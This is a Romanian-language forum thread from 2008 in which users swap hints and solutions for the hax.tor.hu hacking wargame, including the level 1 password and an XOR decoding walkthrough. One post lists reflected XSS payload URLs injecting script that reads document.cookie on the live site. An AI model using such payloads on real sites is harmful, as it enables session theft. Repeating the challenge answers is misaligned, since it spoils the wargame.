http://hax.tor.hu/ challenges

Hertz · August 18, 2008

Care palaria mea aveti idee la 4
IP address is 72.14.221.104. Password is a domain (domain.tld format, no subdomains) that contains the word "art" and resolves to it. You don't have to buy a domain
Reverse IP Domain de pe RST nu merge.
GoogleEarth
Te astept la 7... sa imi zici daca treci

Daca bag

googleearth.com imi zice RESOLVED TO IP 64.233.161.104

Daca bag googleart.com zice la alt IP

wtf?

brugner · August 18, 2008

Care palaria mea aveti idee la 4
IP address is 72.14.221.104. Password is a domain (domain.tld format, no subdomains) that contains the word "art" and resolves to it. You don't have to buy a domain
Reverse IP Domain de pe RST nu merge.
GoogleEarth
Te astept la 7... sa imi zici daca treci
Daca bag
googleearth.com imi zice RESOLVED TO IP 64.233.161.104
Daca bag googleart.com zice la alt IP
wtf?

http://2ip.ru/server.php?ip=72.14.221.104

googlearth.de asta e solutia

Hertz · August 18, 2008

Nu mi merge nici cum ~X( .Nici cu googleearth.de Imi zice solved to IP 219...

PASSED!~

devianc3 · August 18, 2008

AAaah... 7-le e ala super-complicat. Unde iti da un log in hex, si un link la codul sursa al unui exploit mysql?.. right?... Ala e greu.. stiu ca si mie Grunt (thank you) mi l-a explicat...
Ala e!!! problema e ca trebuie sa adaptezi si logul in hex si exploitul...
Mai incerc....

Actually, te uiti in sursa exploitului, si vezi algoritmul de criptare al parolei. Dupa care te uiti in hex, si cauti... de unde incepe parola, si incepi si o calculezi, manual... HINT: uita-te dupa '^' in exploit

Ryuk · August 18, 2008

Pentru un hint mai mare .

Nu trebuie sa te uiti in sursa acelui programel .

Te uiti la descriere sus cum se face criptarea / decriptarea

70 is expanded to 70 00

After the swap the result is: 07 00

XOR with A5: A2 A5

Deci "ca" ar fi

63 - 63 00 = > 36 00 = > 93 A5

61 - 61 00 = > 16 00 = > B3 A5

Ce vedeti ca se tot repeta ? asa gasiti de unde incepe exact parola in log

sper sa nu stric jocu

brugner · August 18, 2008

Pentru un hint mai mare .
Nu trebuie sa te uiti in sursa acelui programel .
Te uiti la descriere sus cum se face criptarea / decriptarea
70 is expanded to 70 00
After the swap the result is: 07 00
XOR with A5: A2 A5
Deci "ca" ar fi
63 - 63 00 = > 36 00 = > 93 A5
61 - 61 00 = > 16 00 = > B3 A5
Ce vedeti ca se tot repeta ? asa gasiti de unde incepe exact parola in log
sper sa nu stric jocu

A5 iz the shit ....

devianc3 · August 18, 2008

Vorba vine... Level 13, any hints?

m00n_shine · August 18, 2008

We need the owl's name. The owl appearing on the default vhost on hax.tor.hu's IP.

Password is ??? ? owl.

Nu inteleg ce trebuie sa fac aici la ce 'owl' se refera,e vre-un acronim de la ceva ??

devianc3 · August 18, 2008

We need the owl's name. The owl appearing on the default vhost on hax.tor.hu's IP.
Password is ??? ? owl.
Nu inteleg ce trebuie sa fac aici la ce 'owl' se refera,e vre-un acronim de la ceva ??

si pentru tine e acelasi raspuns:

http://www.myipneighbors.com/

brugner · August 18, 2008

We need the owl's name. The owl appearing on the default vhost on hax.tor.hu's IP.
Password is ??? ? owl.
Nu inteleg ce trebuie sa fac aici la ce 'owl' se refera,e vre-un acronim de la ceva ??

Bufnitza frate... cum o cheama pe bufnitza

devianc3 · August 19, 2008

Care are idee cum aflu userul din level 13?

m00n_shine · August 20, 2008

ma poate ajuta cineva la lvl7 ,cel cu exploiyu de sql.am rescris exploitu dar cand decodez texxtul imi afiseaza chestii cam aiurea,ceva de genu "JZJdZ:Z?Œ]|:ZZ?}àZ;ZZ?nÜL¼,?ZZZZZZZZ?Xl¬¼Ý?ZZZZZZZZ?]|(¸ÊZ??ŽoÿîYIZ?dZ

ZZ+?úZZZZZZZ?mÜZœ.ZJ?ZZZZZZZZ?œL¼,

L,?ZZZZZZZZ?X¬X

m¯?ZZZZZZZZ?ZZZZZZZ?IZZ9JZJŽ?ZZZZZZZ?XoOžXo}?=}ZZÚ*d?YÉ9Z?É9…ZZZ"

m00n_shine · August 20, 2008

me again ,am trecut si de lvl7,faceam eu o prostie la decodare.

as avea nevoie de putin ajutor la lvl 11,cel cu hasu' MD5,scriptul aceal in perl e corect sau trebuie corectat ?,si ce vrea sa faca ??

mersi anticipat

sonyx · August 20, 2008

M-am blocat la level 28 .

are si niste XSS-uri site-u

http://hax.tor.hu/login/index.php/"><script>alert(document.cookie)</script><a

http://hax.tor.hu/peek/index.php/"><script>alert(document.cookie)</script><

http://hax.tor.hu/board/index.php/"><script>alert(document.cookie)</script><a

http://hax.tor.hu/shellaccount/index.php/"><script>alert(document.cookie)</script><a

Nu prea postez pe aici . De obicei imi place sa citesc

Edit : http://hax.tor.hu/peek/index.php/?all=1

Edit2 : Pentru cei care nu stiu ~ indicii

Level 1 : warmup1+solution

Level 2 : SSH

Level 3 : index.php ~ Pear

Level 4 : stick??????

Level 5 : urmatoru'

devianc3 · August 20, 2008

Sony.. un indiciu.. grosolan, pt level 13? ;;)

sonyx · August 20, 2008

de la 5 in sus nu dau ca ma injura astia

si-asa nu trebuia sa le dau nici p'alea

Level 13. PHP with source - needs exploiting and/or o-o-t-b thinking

Hack-Test : http://www.hack-test.com/clipart.php ~ Level 12

brugner · August 20, 2008

me again ,am trecut si de lvl7,faceam eu o prostie la decodare.
as avea nevoie de putin ajutor la lvl 11,cel cu hasu' MD5,scriptul aceal in perl e corect sau trebuie corectat ?,si ce vrea sa faca ??
mersi anticipat

Dudes..care e faza cu poemul ala....de la level10?

m00n_shine · August 20, 2008

caut poemul ,si il decriptezi,inlocuiesti fiecare litera cu corespondenta ei din poem,PS:uita-te cate versuri are poemul si cate are hintul tau.

cine imi poate traduce linile astea din perl

" $l =~ s/[\n\r\t ]+/ /g;

if ($l =~ /hash for: "([^"]+)"/)

"

care e conditia ,ca if-ul sa fie true ??

raptor · August 20, 2008

fratilor inebunesc spunetimi si mie care e parola ca sunt asa de prost ca de nivel 1 nu trec

function a(){

thepw = 'warmup1';

thepw = thepw+'solution';

if (document.lf.pw.value==thepw) {

document.location = '/'+thepw; } else { alert('That is not correct. Please try again.');

}

aici e parola?

int · August 20, 2008

Pass este "warmup1solution"

sonyx · August 20, 2008

si la mine la fel level1 cel mai nasol ~

m00n_shine · August 20, 2008

un idiciu la lvl 11 va rog,de ce perlu de script imi da un hash diferit fata de cel de la hint2 ??

m00n_shine · August 21, 2008

la lvl 11,timpul acela de 10 sec are vre-o legatura cu solutia?,daca da ce legatura?,dar poza aceea cu cheerleader?

devianc3 · August 21, 2008

de la 5 in sus nu dau ca ma injura astia
si-asa nu trebuia sa le dau nici p'alea
Level 13. PHP with source - needs exploiting and/or o-o-t-b thinking
Hack-Test : http://www.hack-test.com/clipart.php ~ Level 12

Da-mi PM atunci...

m00n_shine · August 21, 2008

devianc3,da-mi si mie o 'mana ' de ahutor la level 11 daca te rog,cel cu hashul de md5

Sign In

http://hax.tor.hu/ challenges

Recommended Posts

Hertz

brugner

Hertz

devianc3

Ryuk

brugner

devianc3

m00n_shine

devianc3

brugner

devianc3

m00n_shine

m00n_shine

sonyx

devianc3

sonyx

brugner

m00n_shine

raptor

int

sonyx

m00n_shine

m00n_shine

devianc3

m00n_shine

Join the conversation

shinnok

Hertz

Browse

Activity

Pages